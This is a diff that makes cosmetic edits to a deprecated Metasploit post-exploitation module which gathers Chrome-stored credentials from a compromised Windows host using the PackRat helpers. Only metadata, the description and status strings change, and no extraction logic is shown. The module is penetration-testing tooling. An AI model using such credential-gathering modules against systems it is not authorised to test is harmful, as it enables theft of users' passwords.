@@ -1,16 +1,12 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Post
-  # this associative array defines the artifacts known to PackRat
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
-
   include Msf::Exploit::Deprecated
 
   deprecated nil, 'The post/windows/gather/enum_browsers module now supersedes this module'
@@ -92,12 +88,9 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name' => 'Chrome credential gatherer',
+        'Name' => 'Chrome Credential Gatherer',
         'Description' => %q{
-          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-          Further details can be found in the module documentation.
-          This is a module that searches for credentials stored on Chrome in a windows remote host.
+          This module searches for credentials stored on Chrome on a Windows host.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -142,6 +135,6 @@ class MetasploitModule < Msf::Post
       run_packrat(userprofile, ARTIFACTS)
     end
 
-    print_status 'PackRat credential sweep Completed'
+    print_status 'PackRat credential sweep completed'
   end
 end
